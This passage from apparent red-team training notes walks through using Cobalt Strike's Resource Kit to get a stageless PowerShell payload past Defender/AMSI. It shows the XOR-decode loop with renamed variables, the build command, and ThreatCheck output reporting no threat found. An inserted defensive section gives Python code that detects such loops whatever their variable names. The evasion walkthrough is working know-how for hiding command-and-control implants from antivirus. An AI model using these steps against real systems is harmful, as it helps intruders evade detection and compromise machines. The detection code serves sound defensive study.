Resource Kit

The Resource Kit can be found in C:\Tools\cobaltstrike\arsenal-kit\kits\resource. The portion of the ThreatCheck output that we want to pay attention to is the for loop:

```powershell
for ($x = 0; $x -lt $var_code.Count; $x++) {
    $var_code[$x] = $var_code[$x] -bxor 35
}
```

The 64-bit stageless PowerShell payload is taken from template.x64.ps1. Interestingly, if we open it in Visual Studio Code, we see the following on lines 26-28:

```powershell
for ($zz = 0; $zz -lt $v_code.Count; $zz++) {
    $v_code[$zz] = $v_code[$zz] -bxor 35
}
```

HelpSystems have already provided a template with different variable names: $zz in place of $x and $v_code in place of $var_code. This bypasses Defender as it is, so we don't actually need to modify it. As before, use the included build script and specify an output directory, then load resources.cna into Cobalt Strike.
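The lesson for the detection side is that a signature keyed on the literal variable names ($x, $var_code) is trivially bypassed by a rename. The following added example (not part of this page or the Resource Kit) shows two name-agnostic checks a defender can run over PowerShell text: a regex that matches the XOR-decode loop shape with backreferences instead of fixed names, and a normaliser that maps every $variable to a canonical index so both loops above hash to the same string. The sample scripts are constructed from the two loops shown on this page plus one benign loop.

```python
import re

# Constructed samples: the two loops from this page and a harmless counting loop.
ORIGINAL_LOOP = (
    "for ($x = 0; $x -lt $var_code.Count; $x++) {\n"
    "\t$var_code[$x] = $var_code[$x] -bxor 35\n}"
)
TEMPLATE_LOOP = (
    "for ($zz = 0; $zz -lt $v_code.Count; $zz++) {\n"
    "\t$v_code[$zz] = $v_code[$zz] -bxor 35\n}"
)
BENIGN_LOOP = "for ($i = 0; $i -lt $items.Count; $i++) { $total += $items[$i] }"

# Shape of the decode loop: index and buffer are captured once, then required to
# reappear via backreferences, so any rename still matches.
XOR_LOOP = re.compile(
    r"for\s*\(\s*\$(?P<idx>\w+)\s*=\s*0\s*;"
    r"\s*\$(?P=idx)\s+-lt\s+\$(?P<buf>\w+)\.Count\s*;"
    r"\s*\$(?P=idx)\+\+\s*\)\s*\{"
    r"\s*\$(?P=buf)\[\$(?P=idx)\]\s*=\s*\$(?P=buf)\[\$(?P=idx)\]"
    r"\s+-bxor\s+(?P<key>\d+)\s*\}",
    re.IGNORECASE,
)


def find_xor_loops(script: str) -> list:
    """Return one record per single-byte XOR decode loop found in the script."""
    hits = []
    for m in XOR_LOOP.finditer(script):
        hits.append({
            "index_var": m["idx"],
            "buffer_var": m["buf"],
            "key": int(m["key"]),
            "line": script.count("\n", 0, m.start()) + 1,
        })
    return hits


def normalize_variables(script: str) -> str:
    """Replace each distinct $name with $v0, $v1, ... in order of first use and
    collapse whitespace, so renamed copies of the same code compare equal."""
    names = {}

    def canonical(m):
        key = m.group(1).lower()
        names.setdefault(key, f"$v{len(names)}")
        return names[key]

    renamed = re.sub(r"\$(\w+)", canonical, script)
    return re.sub(r"\s+", " ", renamed).strip()
```

Running find_xor_loops over the template reports the buffer $v_code, index $zz and key 35, while the benign loop yields nothing; normalize_variables returns the identical string for both decode loops.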

```
./build.sh /mnt/c/Tools/cobaltstrike/resources
[Resource Kit] [+] Copy the resource files
[Resource Kit] [+] Generate the resources.cna from the template file.
[Resource Kit] [+] The resource kit files are saved in '/mnt/c/Tools/cobaltstrike/resources'
```

Regenerate your payloads for the final time and confirm that ThreatCheck no longer flags the PowerShell payload:

```
PS C:\Users\Attacker> C:\Tools\ThreatCheck\ThreatCheck\bin\Debug\ThreatCheck.exe -f C:\Payloads\http_x64.ps1 -e AMSI
[+] No threat found!
[*] Run time: 0.34s
```
